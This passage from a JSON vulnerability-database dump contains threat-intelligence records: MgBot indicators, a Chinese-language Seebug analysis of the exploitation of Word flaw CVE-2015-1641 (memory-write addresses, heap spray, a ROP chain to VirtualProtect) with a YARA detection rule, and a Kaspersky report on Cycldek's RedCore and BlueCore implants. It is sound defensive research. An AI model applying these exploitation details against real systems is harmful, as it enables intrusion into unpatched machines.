by Cobalt Strike as a C&C server. \n\n**42.99.116[.]225**: C&C server used by final Payload.\n\n**Android samples**\n\nb5304a0836baf1db8909128028793d12bd418ff78c69dc6f9d014cadede28b77 \n9aade1f7a1f067688d5da9e9991d3a66799065ffe82fca7bb679a71d89fec846 \n5f7f87db34340ec83314313ec40333aebe6381ef00b69d032570749d4cedee46\n\nThe post [Chinese APT group targets India and Hong Kong using new variant of MgBot malware](<https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {}, "published": "2020-07-21T15:00:00", "type": "malwarebytes", "title": "Chinese APT group targets India and Hong Kong using new variant of MgBot malware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2018-8174"], "modified": "2020-07-21T15:00:00", "id": "MALWAREBYTES:22A53B0983AD9ADDB8E7F3DC1E2A1440", "href": "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:21:09", "description": "\u6765\u6e90\uff1a http://drops.wooyun.org/papers/9809\r\n\r\n### Microsoft Office \u5185\u5b58\u635f\u574f\u6f0f\u6d1e\r\n\r\n\r\n### 0x01 \u6f0f\u6d1e\u6982\u8ff0\r\n\r\n\u4eca\u5e744\u6708\u4efd\u5fae\u8f6f\u4fee\u8865\u4e86\u4e00\u4e2a\u540d\u4e3aCVE-2015-1641\u7684word\u7c7b\u578b\u6df7\u6dc6\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u6784\u9020\u5d4c\u5165\u4e86docx\u7684rtf\u6587\u6863\u8fdb\u884c\u653b\u51fb\u3002word\u5728\u89e3\u6790docx\u6587\u6863\u5904\u7406displacedByCustomXML\u5c5e\u6027\u65f6\u672a\u5bf9customXML\u5bf9\u8c61\u8fdb\u884c\u9a8c\u8bc1\uff0c\u53ef\u4ee5\u4f20\u5165\u5176\u4ed6\u6807\u7b7e\u5bf9\u8c61\u8fdb\u884c\u5904\u7406\uff0c\u9020\u6210\u7c7b\u578b\u6df7\u6dc6\uff0c\u5bfc\u81f4\u4efb\u610f\u5185\u5b58\u5199\u5165\uff0c\u6700\u7ec8\u7ecf\u8fc7\u7cbe\u5fc3\u6784\u9020\u7684\u6807\u7b7e\u4ee5\u53ca\u5bf9\u5e94\u7684\u5c5e\u6027\u503c\u53ef\u4ee5\u9020\u6210\u8fdc\u7a0b\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\n\r\n\u6839\u636e\u5fae\u8f6f\u5b98\u65b9MS15-33\u5b89\u5168\u516c\u544a\u91cc\u663e\u793a\uff0c\u8fd9\u4e2a\u6f0f\u6d1e\u8986\u76d6Office 2007 SP3\uff0cOffice 2010 SP2\uff0832\u4f4d\u548c64\u4f4d\uff09\uff0cOffice 2013 SP1\uff0832\u4f4d\u548c64\u4f4d\uff09\uff0cOffice 2013RT SP1\uff0cWord for Mac 2011\u4ee5\u53caOffice\u5728SharePoint\u670d\u52a1\u5668\u4e0a\u7684Office 2010/2013\u548cOffice Web 2010/2013\u5e94\u7528\uff0c\u9664\u6b64\u4e4b\u5916\uff0c\u7ecf\u8fc7\u9a8c\u8bc1Office 2010 SP1\u4e5f\u53d7\u8be5\u6f0f\u6d1e\u7684\u5f71\u54cd\uff0c\u4f46\u662f\u5fae\u8f6f\u9488\u5bf9\u8be5\u6f0f\u6d1e\u57282010\u4e0a\u7684\u8865\u4e01KB2553428\u5e76\u672a\u63a8\u51faSP1\u7248\u672c\uff0c\u56e0\u6b64SP1\u7248\u672c\u7684Office 2010\u5230\u76ee\u524d\u5373\u4f7f\u66f4\u65b0\u6240\u6709\u8865\u4e01\u4ecd\u7136\u5b58\u5728\u8be5\u6f0f\u6d1e\u3002\r\n\r\nCVE-2015-1641\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u89e6\u53d1\u975e\u5e38\u7a33\u5b9a\uff0c\u51e0\u4e4e\u5f71\u54cd\u5fae\u8f6f\u76ee\u524d\u6240\u652f\u6301\u7684\u6240\u6709office\u7248\u672c\uff08\u6700\u65b0\u63a8\u51fa\u7684Office 2016\u9664\u5916\uff09\uff0c\u5f71\u54cd\u8303\u56f4\u5341\u5206\u5e7f\u6cdb\u3002\u76ee\u524d\u65e0\u8bba\u662f\u5728VirusTotal\u8fd8\u662f\u5728\u91ce\u5916\u6293\u5230\u7684\u6837\u672c\uff0c\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u653b\u51fb\u6837\u672c\u5df2\u7ecf\u5f00\u59cb\u9010\u6e10\u589e\u52a0\u3002\u6839\u636e\u4ee5\u4e0a\u539f\u56e0\u53ef\u4ee5\u63a8\u65ad\uff0c\u5728\u4eca\u540e\u5f88\u957f\u7684\u4e00\u6bb5\u65f6\u95f4\u5185\u90fd\u4f1a\u5b58\u5728\u8be5\u6f0f\u6d1e\u7684\u653b\u51fb\uff0c\u5e76\u4e14\u6709\u66ff\u4ee3CVE-2012-0158\u7684\u8d8b\u52bf\u3002\r\n\r\n### 0x02 \u6f0f\u6d1e\u539f\u56e0\u5206\u6790\r\n\r\n\u4f7f\u7528\u963f\u91cc\u8c1b\u542c\u5f15\u64ce\u626b\u63cfRTF\u6587\u6863\uff0c\u89e3\u6790\u51fa\u5176\u4e2d\u7684\u4e00\u4e2aword\u6587\u6863\u7684document.xml\u4e2d\u6709\u5982\u4e0b\u4ee3\u7801\uff0c\u5305\u542b\u4e864\u4e2asmartTag\u6807\u7b7e\uff0c\u6bcf\u4e2asmartTag\u4e2d\u53c8\u6709permStart\u6807\u7b7e\uff0c\u800c\u5728permStart\u6807\u7b7e\u4e2d\u7684\u5219\u662f\u5e26\u6709displacedByCustomXml\u5c5e\u6027\u7684moveFromRangeStart\u548cmoveFromRangeEnd\u6807\u7b7e\uff1a\r\n\r\n\r\n\r\n\u9996\u5148\u6765\u8bf4\u660e\u4e00\u4e0b\u51e0\u4e2a\u6807\u7b7e\u53ca\u5c5e\u6027\u7684\u4f5c\u7528\u3002smartTag\u6807\u7b7e\u662f\u7528\u4e8eword\u548cexcel\u4e2d\u7684\u667a\u80fd\u6807\u7b7e\uff0c\u9488\u5bf9\u4eba\u540d\u3001\u65e5\u671f\u3001\u65f6\u95f4\u3001\u5730\u5740\u3001\u7535\u8bdd\u53f7\u7801\u7b49\u8fdb\u884c\u667a\u80fd\u8bc6\u522b\u5e76\u5141\u8bb8\u7528\u6237\u6267\u884c\u7279\u5b9a\u64cd\u4f5c\u7684\u6807\u7b7e\u3002\u6bd4\u5982\u5982\u679cSteve Jobs\u88ab\u8bc6\u522b\u4e3a\u4eba\u540d\uff0c\u5219smartTag\u6807\u7b7e\u53ef\u4ee5\u6267\u884c\u8bf8\u5982\u6253\u5f00\u901a\u8baf\u5f55\u3001\u6dfb\u52a0\u5230\u8054\u7cfb\u4eba\u3001\u9884\u7ea6\u4f1a\u8bae\u7b49\u64cd\u4f5c\uff0c\u7ed9office\u7528\u6237\u63d0\u4f9b\u66f4\u591a\u81ea\u5b9a\u4e49\u7684\u667a\u80fd\u9009\u62e9\u3002displacedByCustomXml\u5728\u5f88\u591a\u6807\u7b7e\u4e2d\u90fd\u53ef\u4ee5\u4f7f\u7528\uff0c\u76ee\u7684\u662f\u5f53\u524d\u6807\u7b7e\u5904\u9700\u8981\u88ab\u4e00\u4e2acustomXML\u4e2d\u7684\u5185\u5bb9\u4ee3\u66ff\uff0c\u5b83\u7684\u503c\u662fnext\u8868\u793a\u88ab\u4e0b\u4e00\u4e2acustomXML\u4ee3\u66ff\uff0cprev\u5219\u8868\u793a\u88ab\u4e0a\u4e00\u4e2a\u4ee3\u66ff\u3002\r\n\r\n\u8fd9\u4e2a\u6f0f\u6d1e\u662f\u4e00\u4e2a\u7c7b\u578b\u6df7\u6dc6\u6f0f\u6d1e\uff0c\u672c\u6765\u5e26\u6709displacedByCustomXml\u7684\u6807\u7b7e\u4f1a\u88ab\u4e0a\u4e00\u4e2a\u6216\u4e0b\u4e00\u4e2acustomXML\u4ee3\u66ff\uff0c\u4f46\u662fword\u6ca1\u6709\u5bf9\u4f20\u5165\u7684customXML\u5bf9\u8c61\u8fdb\u884c\u4e25\u683c\u7684\u6821\u9a8c\uff0c\u5bfc\u81f4\u53ef\u4ee5\u4f20\u5165\u8bf8\u5982smartTag\u5bf9\u8c61\uff0c\u7136\u800csmartTag\u5bf9\u8c61\u7684\u5904\u7406\u6d41\u7a0b\u548ccustomXML\u5e76\u4e0d\u76f8\u540c\uff0c\u4e0a\u8ff0\u7279\u6b8a\u5904\u7406\u7684smartTag\u6807\u7b7e\u4e2d\u7684element\u5c5e\u6027\u503c\u4f1a\u88ab\u5f53\u4f5c\u662f\u4e00\u4e2a\u5730\u5740\uff0c\u968f\u540e\u7ecf\u8fc7\u7b80\u5355\u7684\u8ba1\u7b97\u5f97\u5230\u53e6\u4e00\u4e2a\u5730\u5740\u3002\u6700\u540e\u5904\u7406\u6d41\u7a0b\u4f1a\u5c06moveFromRangeEnd\u7684id\u503c\u8986\u76d6\u5230\u4e4b\u524d\u8ba1\u7b97\u51fa\u6765\u7684\u5730\u5740\u4e2d\uff0c\u5bfc\u81f4\u4efb\u610f\u5185\u5b58\u5199\u5165\uff0c\u6f0f\u6d1e\u4ee3\u7801\u5982\u4e0b\uff1a\r\n\r\n\r\n\r\n\u901a\u8fc7\u4e0b\u9762\u7684\u8865\u4e01\u5bf9\u6bd4\u53ef\u4ee5\u5f88\u5bb9\u6613\u770b\u5230\u6253\u4e0a\u6700\u65b0\u8865\u4e01\u7684word\u4ee3\u7801\u589e\u52a0\u4e86\u5bf9customXML\u5bf9\u8c61\u5904\u7406\u51fd\u6570\u7684\u6821\u9a8c\uff1a\r\n\r\n\r\n\r\n### 0x03 \u6f0f\u6d1e\u5229\u7528\u5206\u6790\r\n\r\n\u5229\u7528\u7684\u5206\u6790\u73af\u5883\u4e3awin7 64\u4f4d+office2010 sp2 32\u4f4d\u3002\r\n\r\n\u867d\u7136\u8fd9\u4e0a\u9762\u67094\u4e2asmartTag\u6807\u7b7e\uff0c\u4f46\u5c31\u76ee\u524d\u5206\u6790\u6765\u770b\uff0c\u524d\u4e24\u4e2a\u6807\u7b7e\u662f\u6f0f\u6d1e\u5229\u7528\u7684\u5173\u952e\u3002\u9996\u5728\u89e3\u6790\u7b2c\u4e00\u4e2asmartTag\u6807\u7b7e\u65f6\u4f1a\u628a\u5176moveFromRangeEnd\u5b50\u6807\u7b7e\u7684id\u8fdb\u884c\u89e3\u6790\uff0c\u7136\u540e\u5199\u52300x7c38bd74\u8fd9\u4e2a\u5730\u5740\u4e2d\u53bb\uff0c\u8fd9\u4e2a\u5730\u5740\u662f\u6839\u636esmartTag\u7684element\u53730x7c38bd50\u8ba1\u7b97\u51fa\u6765\u7684\uff1a\r\n\r\n\r\n\r\n\u7136\u540e\u89e3\u6790\u7b2c\u4e8c\u4e2asmartTag\u6807\u7b7e\uff0cesi\u6307\u5411\u7684\u5185\u5b58\u5c31\u662fsmartTag\u7684\u7ed3\u6784\u4f53\uff0cesi+4\u7684\u5185\u5bb9\u662felement\u5c5e\u6027\u503c\uff1a\r\n\r\n\r\n\r\n\u800ceax\u7684\u503c\u4e3a0x7C376FC3\uff0c\u521a\u597d\u5c31\u662fmoveFromRangeEnd\u5bf9\u8c61id \"2084007875\"\u7684\u5341\u516d\u8fdb\u5236\u503c\uff1a\r\n\r\n\r\n\r\n\u7136\u540e\u8986\u76d6MSVCR71.dll\u4e2d0x7c38a428\uff0c\u8fd9\u662f\u4e00\u4e2a\u865a\u51fd\u6570\u7684\u6307\u9488\uff0c\u800c0x7c38a428\u8fd9\u4e2a\u5730\u5740\u662f\u901a\u8fc7\u5f53\u524dsmartTag\u7684element\u5c5e\u6027\u503c\u53730x7c38bd68\u548c\u7b2c\u4e00\u4e2asmartTag\u6807\u7b7e\u4e2dmoveFromRangeStart\u7684id\u5171\u540c\u8ba1\u7b97\u51fa\u6765\u7684\uff1a\r\n\r\n\r\n\r\n\u8c03\u8bd5\u53ef\u4ee5\u770b\u5230\u5982\u4e0b\u5185\u5b58\uff0cecx\u7684\u5185\u5b58\u5982\u4e0b\uff0cecx+0xc\u5c31\u662f\u4e0a\u9762\u89e3\u6790\u7b2c\u4e00\u4e2asmartTag\u6807\u7b7e\u65f6\u5199\u5165\u7684\u503c\uff0c\u6700\u7ec8\u8ba1\u7b97\u5f97\u5230\u7684\u88ab\u8986\u76d6\u7684\u5730\u5740\u4fbf\u662f0x7c38a428\uff1a\r\n\r\n\r\n\r\n\u800c\u5728\u8986\u76d6\u4e4b\u524d0x7c38a428\u5904\u7684\u6307\u9488\u6307\u5411kernel32! FlsGetValue:\r\n\r\n\r\n\r\n\u6700\u540e\u8c03\u7528memcpy\u51fd\u6570\u8fdb\u884c\u8986\u76d6\uff1a\r\n\r\n\r\n\r\n\u8986\u76d6\u4e4b\u540e\u76840x7c38a428\u6307\u5411\u7684\u4fbf\u662f\u653b\u51fb\u8005\u60f3\u8981\u6267\u884c\u7684\u4ee3\u7801\u4f4d\u7f6e\uff1a\r\n\r\n\r\n\r\n\u603b\u7ed3\u4e00\u4e0b\u5229\u7528\u6d41\u7a0b\u5982\u4e0b\uff1a\u9996\u5148smartTag_1\uff08\u7b2c\u4e00\u4e2asmartTag\u6807\u7b7e\uff09\u7684element\u5c5e\u6027\u503c\u8fdb\u884c\u7b80\u5355\u8ba1\u7b97\u5f97\u5230\u4e00\u4e2a\u5730\u5740addr1\uff0c\u7136\u540e\u5c06\u5176moveFromRangeEnd_1\u5b50\u6807\u7b7e\u7684id\u5199\u5165\u5230addr1\u4e2d\u5907\u7528\uff1b\u7136\u540e\u89e3\u6790smartTag_2\uff0c\u6839\u636e\u4ed6\u7684element\u5c5e\u6027\u503c\u548c\u524d\u9762\u8ba1\u7b97\u51fa\u6765\u7684addr1\u5171\u540c\u8ba1\u7b97\u51fa\u53e6\u4e00\u4e2a\u5730\u5740addr2\uff0c\u5e76\u5c06\u5176\u5b50\u6807\u7b7emoveFromRangeEnd_2\u7684id\u5199\u5165\u5230addr2\uff0c\u800caddr2\u662f\u4e00\u4e2a\u865a\u51fd\u6570\u8868\u4e2d\u7684\u5730\u5740\uff0c\u8fd9\u6837\u539f\u672c\u662f\u8fd9\u4e2a\u865a\u51fd\u6570\u7684\u5730\u5740\u5c31\u88ab\u8986\u76d6\u6210\u653b\u51fb\u8005\u60f3\u8981\u6267\u884c\u7684\u4efb\u610f\u4ee3\u7801\u7684\u5730\u5740\uff0c\u6f0f\u6d1e\u5229\u7528\u6210\u529f\u3002\r\n\r\nword\u5728office2010\u7684\u73af\u5883\u4e0b\u6ca1\u6709\u6253\u8865\u4e01\u7684\u60c5\u51b5\u4e0b\u6267\u884c\u7684\u5806\u55b7\u5c04\u540e\u7684\u5730\u5740\u4e3a0x0900080C\uff0c\u5982\u4e0b\uff1a\r\n\r\n\r\n\r\n\u770b\u5230\u8fd9\u6bb5\u5185\u5b58\u60f3\u5fc5\u90fd\u5df2\u7ecf\u6e05\u695a\u4e86\uff0c\u8fd9\u91cc\u5c31\u662fRTF\u6587\u6863\u91ca\u653e\u7684activeX.bin\u6587\u4ef6\u7684\u5185\u5bb9\uff0c\u800c0x7c342404\u5904\u7684\u4ee3\u7801\u662fret\uff0c\u56e0\u6b64\u8fd9\u91cc\u4f1a\u4e00\u76f4\u6267\u884cret\u76f4\u5230\u5230\u8fbe\u6700\u7ec8ROP\u7684\u4f4d\u7f6e\uff0cROP\u94fe\u5982\u4e0b\uff1a\r\n\r\n\r\n\r\n\u6beb\u65e0\u7591\u95eeROP\u7684\u4f5c\u7528\u8fd8\u662f\u8c03\u7528VirtualProtect\u51fd\u6570\u5bf9\u5f53\u524d\u8fd9\u5757\u5185\u5b58\u6dfb\u52a0\u53ef\u6267\u884c\u6743\u9650\uff1a\r\n\r\n\r\n\r\n\u83b7\u5f97\u6267\u884c\u6743\u9650\u4e4b\u540e\u5f00\u59cb\u6267\u884cshellcode\uff1a\r\n\r\n\r\n\r\n### 0x04 \u6f0f\u6d1e\u5229\u7528\u68c0\u6d4b\r\n\r\n\u60f3\u8981\u68c0\u6d4b\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u653b\u51fb\u6837\u672c\u5fc5\u987b\u8981\u5148\u4ecertf\u6587\u6863\u63d0\u53d6\u51fadocx\u7136\u540e\u83b7\u53d6\u5230document.xml\uff0cyara\u89c4\u5219\u5982\u4e0b\uff1a\r\n\r\n```\r\nrule CVE_2015_1641\r\n{\r\n meta:\r\n description=\"Word Type Confusion Vulnerability\"\r\n output=\"Nday & CVE-2015-1641\"\r\n strings:\r\n $smart_tag=/<w:smartTag[\\w\\W]+?w:element=\\\"(&#x[a-zA-Z0-9]{4};){2}\\\">[\\w\\W]+?<w:permStart[\\w\\W]+?w:displacedByCustomXml=\\\"prev\\\"\\/>[\\w\\W]+?<w:permEnd[\\w\\W]+?<\\/w:smartTag>/\r\n condition:\r\n $smart_tag\r\n}\r\n```\r\n\r\n\u4e0a\u9762\u7684\u89c4\u5219\u5339\u914d\u5176\u5b9e\u5c31\u662f\u4e00\u4e2a\u6b63\u5219\u5339\u914d\uff0c\u4ece\u5de6\u5230\u53f3\u6d41\u7a0b\u5982\u4e0b\uff1a1.\u5339\u914d\u5230smartTag\u6807\u7b7e\uff0c\u67e5\u770b\u5176element\u5c5e\u6027\u662f\u5426\u4e3a\u5341\u516d\u8fdb\u5236\u6570\u503c\u4f5c\u4e3a\u5730\u5740\uff1b2.\u5728smartTag\u6807\u7b7e\u4e2d\u5339\u914d\u5230permStart\u6807\u7b7e\uff0c\u5728\u5b83\u7684\u5c5e\u6027\u6216\u5b50\u6807\u7b7e\u7684\u5c5e\u6027\u4e2d\u5b58\u5728displacedByCustomXml=\"prev\"\u3002\u6ee1\u8db3\u4e0a\u8ff0\u4e24\u4e2a\u6761\u4ef6\u5219\u8ba4\u4e3a\u5c31\u662f\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u653b\u51fb\u6837\u672c\u3002\u4f9d\u636e\u4e0a\u9762\u7684yara\u89c4\u5219\u68c0\u6d4b\u8be5\u653b\u51fb\u6837\u672c\u7684document.xml\u7ed3\u679c\u5982\u4e0b\uff1a\r\n\r\n", "cvss3": {}, "published": "2015-12-31T00:00:00", "type": "seebug", "title": "Microsoft Office \u5185\u5b58\u635f\u574f\u6f0f\u6d1e(CVE-2015-1641)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2015-1641"], "modified": "2015-12-31T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-90202", "id": "SSV:90202", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2021-06-08T19:16:46", "description": "MSCOMCTL.ocx code execution, .Net code execution, WinVerifyTrust digital signature validation vulnerability", "edition": 2, "cvss3": {}, "published": "2012-04-23T00:00:00", "type": "securityvulns", "title": "Microsoft Windows multiple security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2012-0163", "CVE-2012-0151"], "modified": "2012-04-23T00:00:00", "id": "SECURITYVULNS:VULN:12320", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12320", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2020-06-03T11:50:54", "description": "\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**__Figure 1_: Timeline of Cycldek-attributed attacks._**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol - McAfee's QuickClean utility, and wsc_proxy.exe, Avast's remediation service.\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. Notable characteristics of each cluster's implant are summarized in the table below.\n\n| **BlueCore** | **RedCore** | \n---|---|---|--- \nInitial Infection Vector | RTF documents | Unknown | \nLegitimate AV Utility | QcConcol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) | \nSide-Loaded DLL | QcLite.dll | wsc.dll | \nPayload Loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm -contains PE loading shellcode and and an encrypted RedCore binary | \nInjected Process | dllhst3g.exe | explorer.exe or winlogon.exe | \nConfiguration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or\n\nC:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini | \nMutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6},\n\n{F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB},\n\n{E68DFA68-1132-4A32-ADE2-8C87F282C457},\n\n{728264DE-3701-419B-84A4-2AD86B0C43A3},\n\n{2BCD5B61-288C-44D5-BA0D-AAA00E9D2273},\n\n{D9AE3AB0-D123-4F38-A9BE-898C8D49A214} | \nCommunicated URL Scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s\n\nor\n\nhttp://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s | \n \n_**_Table 1_: Comparison of BlueCore and RedCore loader and implant traits.** _\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n**__Figure_ 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._**\n\nMoreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n**__Figure 3_: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._**\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single byte XOR with the key 0xFA.\n * _Device enumerator_: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&C and inform it about the connection event.\n * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&C in their original format.\n\nPerhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)\n\n**__Figure 4_: Difference in URL scheme used by each implant for C2 communication._**\n\nThe conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)\n\n_**_Figure 5_: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018.** _\n\nFurthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a 